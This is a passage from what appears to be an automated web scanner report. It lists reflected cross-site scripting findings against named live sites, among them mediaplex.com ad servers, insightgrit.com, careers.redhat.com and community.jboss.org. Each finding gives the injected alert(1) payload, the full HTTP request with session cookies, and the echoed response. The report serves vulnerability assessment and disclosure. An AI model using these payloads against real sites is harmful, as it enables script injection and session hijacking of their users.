Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; expires=Thu, 15-Nov-2012 5:06:42 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 253
Date: Mon, 15 Nov 2010 07:20:25 GMT

document.write('<a target="_blank" href="b0f3e';alert(1)//2351d3570d4http://altfarm.mediaplex.com/ad/ck/11321-114995-1358-12?mpt=2010.11.15.07.15.19"><img ismap border=0 src="http://img-cdn.mediaplex.
...[SNIP]...

4.95. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-12 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11321-114995-1358-12

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7282'%3balert(1)//dabb31c2c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7282';alert(1)//dabb31c2c87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11321-114995-1358-12?mpt=2010.11.15.07.15.19&mpvc=&d7282'%3balert(1)//dabb31c2c87=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; expires=Thu, 15-Nov-2012 6:41:42 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 256
Date: Mon, 15 Nov 2010 07:20:26 GMT

document.write('<a target="_blank" href="&d7282';alert(1)//dabb31c2c87=1http://altfarm.mediaplex.com/ad/ck/11321-114995-1358-12?mpt=2010.11.15.07.15.19"><img ismap border=0 src="http://img-cdn.mediapl
...[SNIP]...

4.96. http://altfarm.mediaplex.com/ad/js/11921-102238-1358-0 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11921-102238-1358-0

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f00d"-alert(1)-"9ba223d4dfb was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11921-102238-1358-0?mpt=2010.11.15.07.15.419f00d"-alert(1)-"9ba223d4dfb&mpvc= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:20:44 GMT
Server: Apache
Last-Modified: Thu, 24 Jun 2010 14:58:41 GMT
ETag: "428a17-b94-489c7e3d92a40"
Accept-Ranges: bytes
Content-Length: 4273
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/11921-102238-1358-0?mpt=2010.11.15.07.15.419f00d"-alert(1)-"9ba223d4dfb\" target=\"_blank\">
...[SNIP]...

4.97. http://altfarm.mediaplex.com/ad/js/11921-102238-1358-0 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11921-102238-1358-0

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 621f8"%3balert(1)//eb4cfdb33af was submitted in the mpvc parameter. This input was echoed as 621f8";alert(1)//eb4cfdb33af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11921-102238-1358-0?mpt=2010.11.15.07.15.41&mpvc=621f8"%3balert(1)//eb4cfdb33af HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:20:55 GMT
Server: Apache
Last-Modified: Thu, 24 Jun 2010 14:58:41 GMT
ETag: "5fc76e-b94-489c7e3d92a40"
Accept-Ranges: bytes
Content-Length: 4177
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=621f8";alert(1)//eb4cfdb33afhttp://altfarm.mediaplex.com%2Fad%2Fck%2F11921-102238-1358-0%3Fmpt%3D2010.11.15.07.15.41&clickTag=621f8";alert(1)//eb4cfdb33afhttp://altfarm.mediaplex.com%2Fad%2Fck%2F11921-102238-1358-0%3Fmpt%3D2010.1
...[SNIP]...

4.98. http://altfarm.mediaplex.com/ad/js/11921-102238-1358-0 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11921-102238-1358-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bfdd"-alert(1)-"59ecd8958d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11921-102238-1358-0?8bfdd"-alert(1)-"59ecd8958d5=1 HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mojo2=12109:16388/9966:3945; mojo1=s/47634/10; mojo3=11921:1358/11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; svid=804356890302;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 11:19:34 GMT
Server: Apache
Last-Modified: Thu, 24 Jun 2010 14:58:41 GMT
ETag: "5fc76e-b94-489c7e3d92a40"
Accept-Ranges: bytes
Content-Length: 4091
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<mpvc/>http://altfarm.mediaplex.com/ad/ck/11921-102238-1358-0?8bfdd"-alert(1)-"59ecd8958d5=1\" target=\"_blank\">
...[SNIP]...

4.99. http://app.insightgrit.com/Visit.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.insightgrit.com
Path:   /Visit.php

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c22f5"%3balert(1)//f53e72d2858 was submitted in the cid parameter. This input was echoed as c22f5";alert(1)//f53e72d2858 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing&adid=5624934659&cid=1234c22f5"%3balert(1)//f53e72d2858&lsd=Google&cta=Webmetrics%20Trial&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1
Host: app.insightgrit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 09:33:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 15 Nov 2010 09:33:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b9828d75a1f6c563c9b9161d81f0a25a; path=/
Set-Cookie: IG84196=84196%3A%3Ab9828d75a1f6c563c9b9161d81f0a25a%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:02 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 1246
Connection: close
Content-Type: text/html

               <body>
        <script language="javascript" type="text/javascript">
               if (/MSIE (\d+\.\d+);/.test(navigator.userAgent))
        {
        var referLin
...[SNIP]...
('a');
        referLink.href = "http://www.webmetrics.com/landingpage/Mon_google_tech2.html?src=Paid Search&kw=cloud computing&lsd=Google&cta=Webmetrics Trial&pf=Webmetrics&cid=1234c22f5";alert(1)//f53e72d2858&lp=http://www.webmetrics.com/landingpage/Mon_google_tech2.html";
        document.body.appendChild(referLink);
                    location.replace("http://www.webmetrics.com/landingpage/Mon_goo
...[SNIP]...

4.100. http://app.insightgrit.com/Visit.php [cta parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.insightgrit.com
Path:   /Visit.php

Issue detail

The value of the cta request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 248b0"%3balert(1)//90365561f2b was submitted in the cta parameter. This input was echoed as 248b0";alert(1)//90365561f2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing&adid=5624934659&cid=1234&lsd=Google&cta=Webmetrics%20Trial248b0"%3balert(1)//90365561f2b&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1
Host: app.insightgrit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 09:33:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 15 Nov 2010 09:33:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=d8b92fbdd47650d83f91811bc30e7132; path=/
Set-Cookie: IG84196=84196%3A%3Ad8b92fbdd47650d83f91811bc30e7132%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:03 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 1246
Connection: close
Content-Type: text/html

               <body>
        <script language="javascript" type="text/javascript">
               if (/MSIE (\d+\.\d+);/.test(navigator.userAgent))
        {
        var referLin
...[SNIP]...
document.createElement('a');
        referLink.href = "http://www.webmetrics.com/landingpage/Mon_google_tech2.html?src=Paid Search&kw=cloud computing&lsd=Google&cta=Webmetrics Trial248b0";alert(1)//90365561f2b&pf=Webmetrics&cid=1234&lp=http://www.webmetrics.com/landingpage/Mon_google_tech2.html";
        document.body.appendChild(referLink);
                    location.replace("http://www.webmetrics.
...[SNIP]...

4.101. http://app.insightgrit.com/Visit.php [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.insightgrit.com
Path:   /Visit.php

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bef2"%3balert(1)//26cf77cb37d was submitted in the kw parameter. This input was echoed as 5bef2";alert(1)//26cf77cb37d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing5bef2"%3balert(1)//26cf77cb37d&adid=5624934659&cid=1234&lsd=Google&cta=Webmetrics%20Trial&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1
Host: app.insightgrit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 09:33:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 15 Nov 2010 09:33:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=02f1d3d5df626107f402d4c973507e41; path=/
Set-Cookie: IG84196=84196%3A%3A02f1d3d5df626107f402d4c973507e41%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:01 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 1246
Connection: close
Content-Type: text/html

               <body>
        <script language="javascript" type="text/javascript">
               if (/MSIE (\d+\.\d+);/.test(navigator.userAgent))
        {
        var referLink = document.createElement('a');
        referLink.href = "http://www.webmetrics.com/landingpage/Mon_google_tech2.html?src=Paid Search&kw=cloud computing5bef2";alert(1)//26cf77cb37d&lsd=Google&cta=Webmetrics Trial&pf=Webmetrics&cid=1234&lp=http://www.webmetrics.com/landingpage/Mon_google_tech2.html";
        document.body.appendChild(referLink);
                    location
...[SNIP]...

4.102. http://app.insightgrit.com/Visit.php [lsd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.insightgrit.com
Path:   /Visit.php

Issue detail

The value of the lsd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbdf8"%3balert(1)//c8bc67fd179 was submitted in the lsd parameter. This input was echoed as cbdf8";alert(1)//c8bc67fd179 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing&adid=5624934659&cid=1234&lsd=Googlecbdf8"%3balert(1)//c8bc67fd179&cta=Webmetrics%20Trial&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1
Host: app.insightgrit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 09:33:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 15 Nov 2010 09:33:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=261d3b1eb577eedbf319cb38751a65ba; path=/
Set-Cookie: IG84196=84196%3A%3A261d3b1eb577eedbf319cb38751a65ba%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:02 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 1246
Connection: close
Content-Type: text/html

               <body>
        <script language="javascript" type="text/javascript">
               if (/MSIE (\d+\.\d+);/.test(navigator.userAgent))
        {
        var referLink = document.createElement('a');
        referLink.href = "http://www.webmetrics.com/landingpage/Mon_google_tech2.html?src=Paid Search&kw=cloud computing&lsd=Googlecbdf8";alert(1)//c8bc67fd179&cta=Webmetrics Trial&pf=Webmetrics&cid=1234&lp=http://www.webmetrics.com/landingpage/Mon_google_tech2.html";
        document.body.appendChild(referLink);
                    location.replace("h
...[SNIP]...

4.103. http://boulevardr.us1.list-manage.com/subscribe/post-json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boulevardr.us1.list-manage.com
Path:   /subscribe/post-json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 19f53<script>alert(1)</script>8e5491c7616 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /subscribe/post-json?u=daebe79d0098f97bb580d51a6&id=542001acb8&c=?19f53<script>alert(1)</script>8e5491c7616 HTTP/1.1
Host: boulevardr.us1.list-manage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 16:09:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Content-Length: 92
Connection: close
Content-Type: application/json; charset=utf-8

?19f53<script>alert(1)</script>8e5491c7616({"result":"error","msg":"Unable to send mail. "})

4.104. https://careers.redhat.com/ext/search [Category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://careers.redhat.com
Path:   /ext/search

Issue detail

The value of the Category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1c66"><img%20src%3da%20onerror%3dalert(1)>a58178b7e64 was submitted in the Category parameter. This input was echoed as b1c66"><img src=a onerror=alert(1)>a58178b7e64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ext/search?act=list&Keyword=jboss&Category=b1c66"><img%20src%3da%20onerror%3dalert(1)>a58178b7e64&Location= HTTP/1.1
Host: careers.redhat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 16:11:26 GMT
Cache-Control: private
Content-Length: 50545
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSSACDQST=DCDDAEJAIMGLODLBPBGPCBHA; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>redhat.com Careers</title>
...[SNIP]...
<a href="/ext/search?act=list&Sortedby=SearchJobID&SortDir=Asc&Category=b1c66"><img src=a onerror=alert(1)>a58178b7e64&Location=&Keyword=jboss&SearchJobID=&PostalCode=&DistanceUnit=&SearchRadius=" style="color:#ffffff;">
...[SNIP]...

4.105. https://careers.redhat.com/ext/search [Category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://careers.redhat.com
Path:   /ext/search

Issue detail

The value of the Category request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2c76"-alert(1)-"5322cc6fab2 was submitted in the Category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ext/search?act=list&Keyword=jboss&Category=d2c76"-alert(1)-"5322cc6fab2&Location= HTTP/1.1
Host: careers.redhat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 16:11:29 GMT
Cache-Control: private
Content-Length: 50329
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSSACDQST=DDDDAEJAEJJHHICMKIIEIIPC; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>redhat.com Careers</title>
...[SNIP]...
<script>
   function Submit_Query_Jtitle() {
       window.location= "/ext/search?act=list&Sortedby=JobTitle&SortDir=Asc&Category=d2c76"-alert(1)-"5322cc6fab2&Location=&Keyword=jboss&SearchJobID=&PostalCode=&DistanceUnit=&SearchRadius=";
   }
   function Submit_Query_Location() {
       window.location= "/ext/search?act=list&Sortedby=Location&SortDir=Asc&Category
...[SNIP]...

4.106. http://community.jboss.org/view-people-tagcloud.jspa [queryEncoded parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.jboss.org
Path:   /view-people-tagcloud.jspa

Issue detail

The value of the queryEncoded request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ef39'%3balert(1)//6e03cdf3cdc was submitted in the queryEncoded parameter. This input was echoed as 6ef39';alert(1)//6e03cdf3cdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /view-people-tagcloud.jspa?queryEncoded=eyJ1aWQiOi0xLCJyZHUiOmZhbHNlLCJycCI6dHJ1ZSwic24iOnRydWUsInNucCI6dHJ1ZSwicmV1IjpmYWxzZSwicmF1aWQiOmZhbHNlLCJzcCI6dHJ1ZSwic2UiOnRydWUsInJvdSI6ZmFsc2UsImZjdCI6ZmFsc2UsIm14Y2QiOi0xLCJzdW4iOnRydWUsIm1uY2QiOi0xLCJydWlkIjpmYWxzZSwicCI6IiIsInBrIjoicHNxXzk4Mjc1NTI5MHwtMSJ96ef39'%3balert(1)//6e03cdf3cdc&_=1289831042783 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://community.jboss.org/people
x-j-token: no-user
x-requested-with: XMLHttpRequest
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: community.jboss.org
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=E76140915DFB659E953BB107D6B8063A; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sq=%5B%5BB%5D%5D; __utmc=241501529; rh_omni_tc=70160000000H4AjAAK; s_nr=1289831032929; s_vnum=1292422844821%26vn%3D1; s_invisit=true; __utma=241501529.1102710681.1289830845.1289830845.1289830845.1; __utmb=241501529.3.10.1289830845; __utmz=241501529.1289830845.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jive.server.info="serverName=community.jboss.org:serverPort=80:contextPath=:localName=clearspace02.app.mwc.hst.phx2.redhat.com:localPort=8080:localAddr=10.5.106.15"; JSESSIONID=DDE1B860157F60EF7F32B1C587D04C48.node0; __utma=153813930.861303267.1289831027.1289831027.1289831027.1; __utmb=153813930.1.10.1289831027; __utmc=153813930; __utmz=153813930.1289831027.1.1.utmcsr=jboss.org|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:34:21 GMT
Server: Apache-Coyote/1.1
X-JAL: 6
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
X-JSL: D=7877 t=1289831661232556
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Content-Length: 18802


<!-- BEGIN result tag cloud -->
<label>By Tags:</label>

<div id="jive-tags-popularlist">
<!-- BEGIN popular tags list -->
<div id="jive-populartags">
<ul class="jive-tagcloud-lis
...[SNIP]...
6dHJ1ZSwicmV1IjpmYWxzZSwicmF1aWQiOmZhbHNlLCJzcCI6dHJ1ZSwic2UiOnRydWUsInJvdSI6ZmFsc2UsImZjdCI6ZmFsc2UsIm14Y2QiOi0xLCJzdW4iOnRydWUsIm1uY2QiOi0xLCJydWlkIjpmYWxzZSwicCI6IiIsInBrIjoicHNxXzk4Mjc1NTI5MHwtMSJ96ef39';alert(1)//6e03cdf3cdc';
<!-- tag cloud calculation completed -->
...[SNIP]...

4.107. https://community.jboss.org/login.jspa [emailAddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://community.jboss.org
Path:   /login.jspa

Issue detail

The value of the emailAddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52342"><script>alert(1)</script>817de34b9e88d53ed was submitted in the emailAddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /login.jspa?emailAddress=rtfm@fastdial.net52342"><script>alert(1)</script>817de34b9e88d53ed&method%3Aregister=true&registerOnly=false HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://community.jboss.org/login.jspa
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: community.jboss.org
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=E76140915DFB659E953BB107D6B8063A; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sq=redhatglobal%2Credhatjbossorg%3D%2526pid%253Dhttps%25253A//community.jboss.org/login.jspa%2526oid%253DConfirm%252520address%2526oidt%253D3%2526ot%253DSUBMIT%2526oi%253D440; __utmc=241501529; rh_omni_tc=70160000000H4AjAAK; s_nr=1289831147323; s_vnum=1292422844821%26vn%3D1; s_invisit=true; __utma=241501529.1102710681.1289830845.1289830845.1289830845.1; __utmb=241501529.3.10.1289830845; __utmz=241501529.1289830845.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jive.server.info="serverName=community.jboss.org:serverPort=80:contextPath=:localName=clearspace02.app.mwc.hst.phx2.redhat.com:localPort=8080:localAddr=10.5.106.15"; JSESSIONID=DDE1B860157F60EF7F32B1C587D04C48.node0; __utma=153813930.861303267.1289831027.1289831027.1289831027.1; __utmb=153813930.1.10.1289831027; __utmz=153813930.1289831027.1.1.utmcsr=jboss.org|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=153813930

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 15:15:30 GMT
Server: Apache-Coyote/1.1
X-JAL: 11
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
X-JSL: D=22090 t=1289834130536927
